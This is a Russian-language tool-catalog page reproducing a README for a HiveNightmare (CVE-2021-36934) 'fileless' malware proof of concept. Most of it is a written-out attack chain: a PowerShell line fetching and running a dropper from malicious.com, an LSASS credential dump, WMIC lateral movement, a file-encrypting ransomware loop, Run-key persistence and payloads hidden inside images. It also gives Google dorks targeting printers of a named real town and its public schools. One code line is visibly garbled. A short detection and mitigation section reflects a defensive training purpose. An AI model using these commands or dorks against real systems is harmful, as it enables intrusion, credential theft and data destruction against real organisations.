Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Why-so-Serious-SAM — PoC-вредонос, использующий эксплойт CVE-2021-36934 (неправильные ACL на теневых копиях) с помощью бесфайлового метода red team на Windows 10/11 и LOLBins, извлекая кусты SYSTEM и SAM для локальных NTLM-хешей. | Kitploit
Инструменты/GitHubGitHub/p1rat3r00t/why-so-serious-sam
Повышение привилегийЭксплуатацияЛатеральное перемещениеПост-эксплуатацияCTFТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

PoC-вредонос, использующий эксплойт CVE-2021-36934 (неправильные ACL на теневых копиях) с помощью бесфайлового метода red team на Windows 10/11 и LOLBins, извлекая кусты SYSTEM и SAM для локальных NTLM-хешей.

РепозиторийСайт
11 год назадЕщё не проверено

HiveNightmare 'Fileless' Exploit PoC:

Screenshot 2025-05-21 001453


Содержание

  • Обзор
  • Возможности
  • Пример лабораторного моделирования
  • Разведка с помощью Google Dorks
  • Обзор LOLBins
  • Встраивание бесфайлового дроппера
  • Эксплуатация Print Spooler и HiveNightmare
  • Reflective DLL Injection
  • Карта MITRE ATT&CK
  • Обнаружение и смягчение
  • Юридический отказ от ответственности
  • Ссылки и дополнительная литература

Обзор

CVE-2021-36934/HiveNightmare — это образовательный исследовательский проект для red/purple team, который моделирует бесфайловую атаку вредоносного ПО на Windows 11. Он позволяет эмулировать реальные цепочки убийств (kill chains) противников с использованием техник MITRE ATT&CK, с акцентом на скрытые, бесфайловые операции.

Предупреждение: Только для исследований и обучения в изолированных лабораториях. Не используйте в производственных или несанкционированных системах.


Возможности

  • Моделирует полноценные бесфайловые атаки программ-вымогателей/стирателей
  • Демонстрирует использование Living Off the Land Binaries (LOLBins)
  • Показывает получение учетных данных, повышение привилегий, горизонтальное перемещение и закрепление
  • Содержит практические примеры лабораторных работ и разведки
  • Соответствует MITRE ATT&CK для упражнений по обнаружению синей команды

Пример лабораторного моделирования

Следующая имитация PowerShell демонстрирует типичную цепочку бесфайловой атаки программы-вымогателя с использованием встроенных инструментов Windows (LOLBins):

root@kitploit:~
# Initial Access: Load dropper
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: Decode and load in-memory payload
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/HEAD/:Load($bytes)

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# File Encryption Example
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistence
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

Разведка с помощью Google Dorks

Пример цели: Найти общедоступные службы печати в Moberly, штат Миссури, потенциально уязвимые для эксплойтов типа PrintNightmare.

Примеры запросов Google Dork:

root@kitploit:~
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

Обзор LOLBins

Living Off the Land Binaries (LOLBins) — это легитимные, доверенные двоичные файлы Windows, которые обычно используются злоумышленниками для обхода средств безопасности и бесфайлового выполнения вредоносного кода.

Пример использования (атака на службу печати):

root@kitploit:~
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

Злоумышленники используют LOLBins, такие как rundll32.exe, regsvr32.exe и powershell.exe, для выполнения полезной нагрузки из сетевых ресурсов, часто после выявления открытых принтеров или серверов с помощью разведки.


Встраивание бесфайлового дроппера

Цель: Скрытно доставлять полезные нагрузки, встраивая архивы внутрь изображений и извлекая их с помощью встроенных инструментов.

Шаги:

  1. Встроить полезную нагрузку:

    root@kitploit:~
    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. Извлечь и декодировать:

    root@kitploit:~
    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

Этот метод обходит традиционную фильтрацию по расширениям файлов и использует встроенные инструменты для уклончивой доставки.


Reflective DLL Injection

Техника: Загрузка и выполнение вредоносной DLL непосредственно в памяти с помощью отражающей загрузки (reflective loading).

Пример:

root@kitploit:~
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

Это обеспечивает скрытое выполнение в памяти без оставления артефактов на диске.


Карта MITRE ATT&CK


Обнаружение и смягчение

Обнаружение

  • Sysmon + Sigma Rules:

    • Отслеживать загрузку несистемных DLL через rundll32.exe
    • Следить за необычным использованием certutil.exe, regsvr32.exe, mshta.exe
    • Отслеживать доступ к теням томов со стороны не администраторов
  • Примеры SIEM (ELK/Splunk):

    • Оповещения о выполнении из общедоступных сетевых папок
    • Аномалии в цепочке родитель/потомок (например, explorer.exe запускает rundll32.exe)
    • Подозрительные закодированные команды в PowerShell или CMD

Смягчение

  • Отключить Print Spooler там, где он не нужен:
    root@kitploit:~
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • Применить все обновления безопасности и ужесточить ACL
  • Заблокировать или ограничить использование LOLBins с помощью AppLocker или WDAC
  • Использовать EDR-решения, которые обнаруживают отражающую загрузку DLL и атаки в памяти

Юридический отказ от ответственности

Весь контент, код и методы, представленные в этом репозитории, предназначены только для образовательных и разрешенных тестов на проникновение. Не используйте любую часть этого проекта вне контролируемых, изолированных сред без явного разрешения. Авторы не несут ответственности за неправомерное использование.


Ссылки и дополнительная литература

  • LOLOL Farm – LOLBin Playground
  • LOLGEN – Generate LOLBin Chains
  • Detecting SeriousSam
  • DLL Injection Primer
  • Print Spooler Exploit Chain
  • Fileless Malware – Wikipedia
  • PrintSpoofer (Original)
  • HiveNightmare
  • Mitre Attck T1055
  • Hivenightmare demo

Будьте в безопасности, исследуйте ответственно и всегда действуйте законно и этично.

Скачать инструмент
ФазаТехникаIDОписание
Начальный доступДопустимые учетные записи / Компрометация через браузерT1078, T1189Компрометация общедоступных интерфейсов печати
ВыполнениеDLL Side-Loading / LOLBinsT1218, T1055.001Запуск DLL через отражающую загрузку с помощью доверенных файлов
Повышение привилегийЭксплойты Print Spooler / Злоупотребление ACL SAMT1068, T1003.002Доступ уровня SYSTEM и извлечение хэшей SAM
Обход защитыБесфайловое выполнение / Обфусцированные файлыT1027, T1202Закодированные полезные нагрузки, доставляемые через certutil, mshta и т.д.
Доступ к учетным даннымДамп LSASS / Доступ к кусту SAMT1003Извлечение учетных данных после HiveNightmare
Горизонтальное перемещениеПеречисление сетевых ресурсов SMB/Net ShareT1021.002Распространение через общие принтеры или перечисление спулера
ВоздействиеУничтожение / Шифрование данныхT1485, T1486Бесфайловый стиратель, активируемый через полезные нагрузки DLL